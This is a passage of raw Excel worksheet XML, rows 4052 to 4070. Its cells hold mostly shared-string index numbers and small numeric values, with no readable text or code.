        <v>3260</v>
      </c>
      <c r="U4052" s="12" t="s">
        <v>26030</v>
      </c>
      <c r="V4052" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4052" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4052" s="12">
        <v>8</v>
      </c>
      <c r="Y4052" s="12" t="s">
        <v>26031</v>
      </c>
    </row>
    <row r="4053" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4053" s="12">
        <v>48291</v>
      </c>
      <c r="B4053" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D4053" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4053" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F4053" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4053" s="12" t="s">
        <v>26032</v>
      </c>
      <c r="H4053" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4053" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4053" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K4053" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4053" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4053" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4053" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4053" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4053" s="12">
        <v>3.6</v>
      </c>
      <c r="Q4053" s="12">
        <v>3.6</v>
      </c>
      <c r="R4053" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4053" s="12" t="s">
        <v>26033</v>
      </c>
      <c r="T4053" s="12" t="s">
        <v>3260</v>
      </c>
      <c r="U4053" s="12" t="s">
        <v>26034</v>
      </c>
      <c r="V4053" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4053" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4053" s="12">
        <v>4</v>
      </c>
      <c r="Y4053" s="12" t="s">
        <v>26035</v>
      </c>
    </row>
    <row r="4054" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4054" s="12">
        <v>48391</v>
      </c>
      <c r="B4054" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4054" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D4054" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4054" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4054" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4054" s="12" t="s">
        <v>26036</v>
      </c>
      <c r="H4054" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4054" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4054" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4054" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4054" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4054" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4054" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4054" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4054" s="12">
        <v>3.5</v>
      </c>
      <c r="Q4054" s="12">
        <v>3.5</v>
      </c>
      <c r="R4054" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4054" s="12" t="s">
        <v>26037</v>
      </c>
      <c r="T4054" s="12" t="s">
        <v>24558</v>
      </c>
      <c r="U4054" s="12" t="s">
        <v>26038</v>
      </c>
      <c r="V4054" s="12" t="s">
        <v>26024</v>
      </c>
      <c r="W4054" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4054" s="12">
        <v>22</v>
      </c>
      <c r="Y4054" s="12" t="s">
        <v>26039</v>
      </c>
    </row>
    <row r="4055" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4055" s="12">
        <v>48781</v>
      </c>
      <c r="B4055" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4055" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4055" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4055" s="12" t="s">
        <v>31307</v>
      </c>
      <c r="G4055" s="12" t="s">
        <v>26041</v>
      </c>
      <c r="H4055" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4055" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4055" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K4055" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4055" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4055" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4055" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4055" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4055" s="12" t="s">
        <v>26040</v>
      </c>
      <c r="Q4055" s="12">
        <v>3.6</v>
      </c>
      <c r="R4055" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4055" s="12" t="s">
        <v>26042</v>
      </c>
      <c r="T4055" s="12" t="s">
        <v>26043</v>
      </c>
      <c r="U4055" s="12" t="s">
        <v>26044</v>
      </c>
      <c r="V4055" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4055" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4055" s="12">
        <v>14</v>
      </c>
      <c r="Y4055" s="12" t="s">
        <v>26045</v>
      </c>
    </row>
    <row r="4056" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4056" s="12">
        <v>48971</v>
      </c>
      <c r="B4056" s="12" t="s">
        <v>28375</v>
      </c>
      <c r="D4056" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4056" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4056" s="12" t="s">
        <v>26046</v>
      </c>
      <c r="H4056" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4056" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J4056" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4056" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4056" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4056" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4056" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4056" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4056" s="12" t="s">
        <v>26047</v>
      </c>
      <c r="Q4056" s="12">
        <v>3.6</v>
      </c>
      <c r="R4056" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4056" s="12" t="s">
        <v>26048</v>
      </c>
      <c r="T4056" s="12" t="s">
        <v>13598</v>
      </c>
      <c r="U4056" s="12" t="s">
        <v>26049</v>
      </c>
      <c r="V4056" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W4056" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4056" s="12">
        <v>2</v>
      </c>
      <c r="Y4056" s="12" t="s">
        <v>26050</v>
      </c>
    </row>
    <row r="4057" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4057" s="12">
        <v>48981</v>
      </c>
      <c r="B4057" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D4057" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E4057" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4057" s="12" t="s">
        <v>30220</v>
      </c>
      <c r="G4057" s="12" t="s">
        <v>26051</v>
      </c>
      <c r="H4057" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4057" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4057" s="12" t="s">
        <v>26027</v>
      </c>
      <c r="K4057" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4057" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4057" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4057" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4057" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4057" s="12" t="s">
        <v>26052</v>
      </c>
      <c r="Q4057" s="12">
        <v>3.6</v>
      </c>
      <c r="R4057" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4057" s="12" t="s">
        <v>26053</v>
      </c>
      <c r="T4057" s="12" t="s">
        <v>26054</v>
      </c>
      <c r="U4057" s="12" t="s">
        <v>26055</v>
      </c>
      <c r="V4057" s="12" t="s">
        <v>25488</v>
      </c>
      <c r="W4057" s="12">
        <v>49031</v>
      </c>
      <c r="X4057" s="12">
        <v>16</v>
      </c>
      <c r="Y4057" s="12" t="s">
        <v>26056</v>
      </c>
    </row>
    <row r="4058" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4058" s="12">
        <v>49001</v>
      </c>
      <c r="B4058" s="12" t="s">
        <v>29926</v>
      </c>
      <c r="D4058" s="12" t="s">
        <v>29937</v>
      </c>
      <c r="E4058" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F4058" s="12" t="s">
        <v>29905</v>
      </c>
      <c r="G4058" s="12" t="s">
        <v>26057</v>
      </c>
      <c r="H4058" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4058" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J4058" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K4058" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4058" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4058" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4058" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4058" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4058" s="12" t="s">
        <v>26058</v>
      </c>
      <c r="Q4058" s="12">
        <v>3</v>
      </c>
      <c r="R4058" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4058" s="12" t="s">
        <v>26059</v>
      </c>
      <c r="T4058" s="12" t="s">
        <v>26060</v>
      </c>
      <c r="U4058" s="12" t="s">
        <v>26061</v>
      </c>
      <c r="V4058" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W4058" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4058" s="12">
        <v>6</v>
      </c>
      <c r="Y4058" s="12" t="s">
        <v>26062</v>
      </c>
    </row>
    <row r="4059" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4059" s="12">
        <v>49101</v>
      </c>
      <c r="B4059" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4059" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4059" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F4059" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4059" s="12" t="s">
        <v>26063</v>
      </c>
      <c r="H4059" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4059" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4059" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K4059" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4059" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4059" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4059" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4059" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4059" s="12" t="s">
        <v>25961</v>
      </c>
      <c r="Q4059" s="12">
        <v>3.6</v>
      </c>
      <c r="R4059" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4059" s="12" t="s">
        <v>26064</v>
      </c>
      <c r="T4059" s="12" t="s">
        <v>4078</v>
      </c>
      <c r="U4059" s="12" t="s">
        <v>26065</v>
      </c>
      <c r="V4059" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W4059" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4059" s="12">
        <v>5</v>
      </c>
      <c r="Y4059" s="12" t="s">
        <v>26066</v>
      </c>
    </row>
    <row r="4060" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4060" s="12">
        <v>49121</v>
      </c>
      <c r="B4060" s="12" t="s">
        <v>30907</v>
      </c>
      <c r="D4060" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4060" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4060" s="12" t="s">
        <v>26067</v>
      </c>
      <c r="H4060" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4060" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4060" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4060" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4060" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4060" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4060" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4060" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4060" s="12" t="s">
        <v>26040</v>
      </c>
      <c r="Q4060" s="12">
        <v>3.6</v>
      </c>
      <c r="R4060" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4060" s="12" t="s">
        <v>26068</v>
      </c>
      <c r="T4060" s="12" t="s">
        <v>26069</v>
      </c>
      <c r="U4060" s="12" t="s">
        <v>26065</v>
      </c>
      <c r="V4060" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W4060" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4060" s="12">
        <v>3</v>
      </c>
      <c r="Y4060" s="12" t="s">
        <v>26070</v>
      </c>
    </row>
    <row r="4061" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4061" s="12">
        <v>49151</v>
      </c>
      <c r="B4061" s="12" t="s">
        <v>30804</v>
      </c>
      <c r="C4061" s="12" t="s">
        <v>30805</v>
      </c>
      <c r="D4061" s="12" t="s">
        <v>30800</v>
      </c>
      <c r="E4061" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4061" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4061" s="12" t="s">
        <v>26071</v>
      </c>
      <c r="H4061" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4061" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4061" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K4061" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4061" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4061" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4061" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4061" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4061" s="12" t="s">
        <v>25961</v>
      </c>
      <c r="Q4061" s="12">
        <v>3.6</v>
      </c>
      <c r="R4061" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4061" s="12" t="s">
        <v>26072</v>
      </c>
      <c r="T4061" s="12" t="s">
        <v>25686</v>
      </c>
      <c r="U4061" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V4061" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4061" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4061" s="12">
        <v>56</v>
      </c>
      <c r="Y4061" s="12" t="s">
        <v>26073</v>
      </c>
    </row>
    <row r="4062" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4062" s="12">
        <v>49201</v>
      </c>
      <c r="B4062" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4062" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D4062" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4062" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4062" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4062" s="12" t="s">
        <v>26074</v>
      </c>
      <c r="H4062" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4062" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4062" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4062" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4062" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4062" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4062" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4062" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4062" s="12" t="s">
        <v>26075</v>
      </c>
      <c r="Q4062" s="12">
        <v>3.7</v>
      </c>
      <c r="R4062" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4062" s="12" t="s">
        <v>26076</v>
      </c>
      <c r="T4062" s="12" t="s">
        <v>26077</v>
      </c>
      <c r="U4062" s="12" t="s">
        <v>26078</v>
      </c>
      <c r="V4062" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4062" s="12" t="s">
        <v>26079</v>
      </c>
      <c r="X4062" s="12">
        <v>146</v>
      </c>
      <c r="Y4062" s="12" t="s">
        <v>26080</v>
      </c>
    </row>
    <row r="4063" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4063" s="12">
        <v>49331</v>
      </c>
      <c r="B4063" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4063" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4063" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4063" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4063" s="12" t="s">
        <v>26089</v>
      </c>
      <c r="H4063" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4063" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4063" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K4063" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4063" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4063" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4063" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4063" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4063" s="12" t="s">
        <v>26090</v>
      </c>
      <c r="Q4063" s="12">
        <v>3.6</v>
      </c>
      <c r="R4063" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4063" s="12" t="s">
        <v>26091</v>
      </c>
      <c r="T4063" s="12" t="s">
        <v>26092</v>
      </c>
      <c r="U4063" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V4063" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W4063" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4063" s="12">
        <v>36</v>
      </c>
      <c r="Y4063" s="12" t="s">
        <v>26093</v>
      </c>
    </row>
    <row r="4064" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4064" s="12">
        <v>49411</v>
      </c>
      <c r="B4064" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4064" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4064" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F4064" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4064" s="12" t="s">
        <v>26094</v>
      </c>
      <c r="H4064" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4064" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4064" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4064" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4064" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4064" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4064" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4064" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4064" s="12" t="s">
        <v>26095</v>
      </c>
      <c r="Q4064" s="12">
        <v>3.6</v>
      </c>
      <c r="R4064" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4064" s="12" t="s">
        <v>26096</v>
      </c>
      <c r="T4064" s="12" t="s">
        <v>10097</v>
      </c>
      <c r="U4064" s="12" t="s">
        <v>26097</v>
      </c>
      <c r="V4064" s="12" t="s">
        <v>24558</v>
      </c>
      <c r="W4064" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4064" s="12">
        <v>26</v>
      </c>
      <c r="Y4064" s="12" t="s">
        <v>26098</v>
      </c>
    </row>
    <row r="4065" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4065" s="12">
        <v>49481</v>
      </c>
      <c r="B4065" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4065" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4065" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4065" s="12" t="s">
        <v>30764</v>
      </c>
      <c r="G4065" s="12" t="s">
        <v>26099</v>
      </c>
      <c r="H4065" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4065" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4065" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4065" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4065" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4065" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4065" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4065" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4065" s="12" t="s">
        <v>26100</v>
      </c>
      <c r="Q4065" s="12">
        <v>3.2</v>
      </c>
      <c r="R4065" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4065" s="12" t="s">
        <v>26101</v>
      </c>
      <c r="T4065" s="12" t="s">
        <v>26102</v>
      </c>
      <c r="U4065" s="12" t="s">
        <v>26103</v>
      </c>
      <c r="V4065" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4065" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4065" s="12">
        <v>16</v>
      </c>
      <c r="Y4065" s="12" t="s">
        <v>26104</v>
      </c>
    </row>
    <row r="4066" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4066" s="12">
        <v>49861</v>
      </c>
      <c r="B4066" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4066" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D4066" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4066" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4066" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4066" s="12" t="s">
        <v>26105</v>
      </c>
      <c r="H4066" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4066" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4066" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4066" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4066" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4066" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4066" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4066" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4066" s="12" t="s">
        <v>24571</v>
      </c>
      <c r="Q4066" s="12" t="s">
        <v>28326</v>
      </c>
      <c r="R4066" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4066" s="12" t="s">
        <v>26106</v>
      </c>
      <c r="T4066" s="12" t="s">
        <v>26107</v>
      </c>
      <c r="U4066" s="12" t="s">
        <v>26108</v>
      </c>
      <c r="V4066" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4066" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4066" s="12">
        <v>6</v>
      </c>
      <c r="Y4066" s="12" t="s">
        <v>26109</v>
      </c>
    </row>
    <row r="4067" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4067" s="12">
        <v>50041</v>
      </c>
      <c r="B4067" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D4067" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4067" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4067" s="12" t="s">
        <v>26110</v>
      </c>
      <c r="H4067" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4067" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4067" s="12" t="s">
        <v>2643</v>
      </c>
      <c r="K4067" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4067" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4067" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4067" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4067" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4067" s="12" t="s">
        <v>26111</v>
      </c>
      <c r="Q4067" s="12">
        <v>3.6</v>
      </c>
      <c r="R4067" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4067" s="12" t="s">
        <v>26112</v>
      </c>
      <c r="T4067" s="12" t="s">
        <v>15310</v>
      </c>
      <c r="U4067" s="12" t="s">
        <v>26113</v>
      </c>
      <c r="V4067" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4067" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4067" s="12">
        <v>94</v>
      </c>
      <c r="Y4067" s="12" t="s">
        <v>26114</v>
      </c>
    </row>
    <row r="4068" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4068" s="12">
        <v>50111</v>
      </c>
      <c r="B4068" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4068" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4068" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4068" s="12" t="s">
        <v>31318</v>
      </c>
      <c r="G4068" s="12" t="s">
        <v>26115</v>
      </c>
      <c r="H4068" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4068" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4068" s="12" t="s">
        <v>23541</v>
      </c>
      <c r="K4068" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4068" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4068" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4068" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4068" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4068" s="12" t="s">
        <v>26116</v>
      </c>
      <c r="Q4068" s="12">
        <v>3.5</v>
      </c>
      <c r="R4068" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4068" s="12" t="s">
        <v>26117</v>
      </c>
      <c r="T4068" s="12" t="s">
        <v>26118</v>
      </c>
      <c r="U4068" s="12" t="s">
        <v>26119</v>
      </c>
      <c r="V4068" s="12" t="s">
        <v>23647</v>
      </c>
      <c r="W4068" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4068" s="12">
        <v>7</v>
      </c>
      <c r="Y4068" s="12" t="s">
        <v>26120</v>
      </c>
    </row>
    <row r="4069" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4069" s="12">
        <v>50181</v>
      </c>
      <c r="B4069" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C4069" s="12" t="s">
        <v>28278</v>
      </c>
      <c r="D4069" s="12" t="s">
        <v>31578</v>
      </c>
      <c r="E4069" s="12" t="s">
        <v>31580</v>
      </c>
      <c r="F4069" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4069" s="12" t="s">
        <v>26121</v>
      </c>
      <c r="H4069" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4069" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4069" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4069" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4069" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4069" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4069" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4069" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4069" s="12">
        <v>3.1</v>
      </c>
      <c r="Q4069" s="12">
        <v>3.1</v>
      </c>
      <c r="R4069" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4069" s="12" t="s">
        <v>26122</v>
      </c>
      <c r="T4069" s="12" t="s">
        <v>26123</v>
      </c>
      <c r="U4069" s="12" t="s">
        <v>26124</v>
      </c>
      <c r="V4069" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4069" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4069" s="12">
        <v>19</v>
      </c>
      <c r="Y4069" s="12" t="s">
        <v>26125</v>
      </c>
    </row>
    <row r="4070" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4070" s="12">
        <v>50441</v>
      </c>
      <c r="B4070" s="12" t="s">
        <v>31144</v>
      </c>
      <c r="D4070" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4070" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4070" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4070" s="12" t="s">
        <v>26126</v>
      </c>
      <c r="H4070" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4070" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4070" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4070" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4070" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4070" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4070" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4070" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4070" s="12" t="s">
        <v>26127</v>
      </c>
      <c r="Q4070" s="12">
        <v>3.7</v>
      </c>
      <c r="R4070" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4070" s="12" t="s">
        <v>26128</v>
      </c>
      <c r="T4070" s="12" t="s">
        <v>26129</v>
      </c>
      <c r="U4070" s="12" t="s">
        <v>26130</v>
      </c>
      <c r="V4070" s="12" t="s">
        <v>8165</v>
      </c>
